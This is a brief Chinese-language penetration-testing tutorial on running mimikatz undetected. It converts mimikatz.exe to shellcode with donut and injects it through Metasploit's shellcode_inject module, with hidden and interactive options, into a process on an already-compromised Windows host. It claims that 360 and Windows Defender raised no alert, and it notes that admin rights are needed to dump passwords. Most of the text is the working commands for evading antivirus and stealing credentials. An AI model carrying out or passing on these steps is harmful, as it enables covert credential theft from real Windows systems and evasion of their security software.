利用进程注入实现mimikatz免杀执行

利用进程注入实现mimikatz免杀执行

提供一种思路实现渗透工具在渗透过程中的灵活运用,本次测试全程杀软未报毒。

环境:360+Windows defender

工具

https://github.com/TheWover/donut

metasploit

0x01

将mimikatz转化为二进制文件.

./donut -f mimikatz.exe -o mimikatz.bin

avatar

已经获取到一个session,这是前提条件嗷

use post/windows/manage/shellcode_inject

set SHELLCODE /root/Github/Bypass/donut/mimikatz.bin

set CHANNELIZED true

set INTERACTIVE true

set HIDDEN true

avatar

注意

mimikatz需要admin权限才能抓密码。

x86的程序只能插入到x86的进程中,x64同理

inject的各个选项极其重要,注意灵活调整。

avatar